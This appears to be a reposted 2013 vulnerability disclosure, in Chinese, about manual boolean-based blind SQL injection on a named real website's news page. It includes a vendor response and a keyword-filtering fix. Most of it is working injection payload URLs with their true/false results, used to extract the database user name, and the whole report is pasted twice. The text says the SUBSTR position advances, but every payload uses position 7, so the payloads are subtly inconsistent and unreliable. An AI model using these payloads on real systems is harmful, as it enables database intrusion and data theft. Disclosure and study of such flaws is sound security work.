<转>手工盲注

披露状态:

 

2013-01-17: 细节已通知厂商并且等待厂商处理中
2013-01-18: 厂商已经确认,细节仅向厂商公开
2013-01-28: 细节向核心白帽子及相关领域专家公开
2013-02-07: 细节向普通白帽子公开
2013-02-17: 细节向实习白帽子公开
2013-03-03: 细节向公众公开

简要描述:

主站sql盲注,今天来一个手工盲注,兄弟们也来学学手工盲注,丫的,手工测试真慢.

详细说明:

1.测试验证是否mysql

0x0.jpg

0x1.jpg





2.测试有多少表

a.jpg



b.jpg



448张表



3.查询一下当前用户长度

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select length(user()))=12 返回正常页面

长度12位



4.爆当前用户

c0.jpg

c1.jpg

c2.jpg

c3.jpg



然后一直用SUBSTR函数截取的位置加1,把所有的ascii码判断出来,最后将ascii码转换字符串



下面是所有测试结果

1.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>99 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 false

100

d



2.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>101 false



101

e



3.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>117 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>118 false



118

y



4.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>63 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>64 false



64

@



5.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 false



49

1



6.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false

48

0



7.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



8.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false

48

0



9.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



10.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>50 false

50

2



11.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



12.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>51 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>52 false

52

4





最后看当前mysql用户:dey@10.0.2.4





爆库爆表都这个原理,先判断字段长度,然后截取每一位转换ascii码,判断大小,最后转换ascii吗,得到字符



你看懂了吗,boolean型盲注,如果没懂,建议学学数据库查询



手工注入原理,先要了解sql语法,只要学会了sql语法,手工注入不在是梦



最后提升,测试sqlmap,havij,pangolin这些注入工具都是注入不了的







漏洞证明:

1.测试验证是否mysql

0x0.jpg

0x1.jpg





2.测试有多少表

a.jpg



b.jpg



448张表



3.查询一下当前用户长度

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select length(user()))=12 返回正常页面

长度12位



4.爆当前用户

c0.jpg

c1.jpg

c2.jpg

c3.jpg



然后一直用SUBSTR函数截取的位置加1,把所有的ascii码判断出来,最后将ascii码转换字符串



下面是所有测试结果

1.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>99 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 false

100

d



2.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>100 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>101 false



101

e



3.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>117 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>118 false



118

y



4.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>63 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>64 false



64

@



5.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 false



49

1



6.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false

48

0



7.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



8.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>47 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>48 false

48

0



9.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



10.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>49 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>50 false

50

2



11.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>45 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>46 false

46

.



12.

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>51 true

http://www.dodonew.com/news_detail.jsp?newsid=601 And (select ASCII(SUBSTR(user(),7,1)))>52 false

52

4





最后看当前mysql用户:dey@10.0.2.4





爆库爆表都这个原理,先判断字段长度,然后截取每一位转换ascii码,判断大小,最后转换ascii吗,得到字符



你看懂了吗,boolean型盲注,如果没懂,建议学学数据库查询



手工注入原理,先要了解sql语法,只要学会了sql语法,手工注入不在是梦



最后提升,测试sqlmap,havij,pangolin这些注入工具都是注入不了的







修复方案:

过滤关键字符,如 and,select

版权声明:转载请注明来源 shack2@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-01-18 09:40

厂商回复:

谢谢shack2关注,已提交技术部处理

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

posted on 2015-10-10 22:58  hahahahahai12  阅读(184)  评论(0)    收藏  举报

导航